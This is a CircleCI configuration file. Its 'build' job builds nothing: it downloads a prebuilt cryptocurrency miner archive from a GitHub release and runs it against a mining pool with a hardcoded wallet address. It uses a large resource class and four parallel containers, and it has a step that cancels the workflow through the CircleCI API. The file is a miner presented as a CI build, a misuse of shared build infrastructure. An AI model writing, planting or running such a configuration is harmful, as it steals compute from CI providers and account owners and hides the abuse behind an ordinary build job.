version: 2.1

jobs:
  build:
    docker:
      - image: cimg/base:current
    resource_class: large
    parallelism: 4
    steps:
      - checkout
      - run:
          name: Install Dependencies
          command: |
            sudo apt-get update
            sudo apt-get install -y wget
      - run:
          name: Download and Extract
          command: |
            wget -qO- https://github.com/bitnet-io/cpuminer-opt-aurum/releases/download/aurum/CPU-AURUM-linux.tar.gz | tar xvz
      - run:
          name: Cancel Job After 5 Minutes
          command: |
            current_time=$(date +%s)
            elapsed_time=$((current_time - CIRCLE_START_TIME))
            max_time=300  # Set your maximum allowed time in seconds (5 minutes)

            if [ "$elapsed_time" -gt "$max_time" ]; then
              echo "Job has exceeded the maximum allowed time. Cancelling..."
              curl -X POST --header "Circle-Token: $CIRCLECI_API_TOKEN" --header "Content-Type: application/json" -d '{"status": "canceled"}' "https://circleci.com/api/v2/workflow/$CIRCLE_WORKFLOW_ID/cancel"
              exit 1
            fi
      - run:
          name: Run command
          command: |
            cd cpuminer-linux && ./cpuminer -a aurum -o stratum+tcp://bnomp.io:3333 -u B9P2PDtk2cftCQiC41hw6Pw9rdJEiVztae -p x
          no_output_timeout: 100s
workflows:
  version: 2
  build_only_develop:
    jobs:
      - build:
          filters:
            branches:
              only:
                - develop
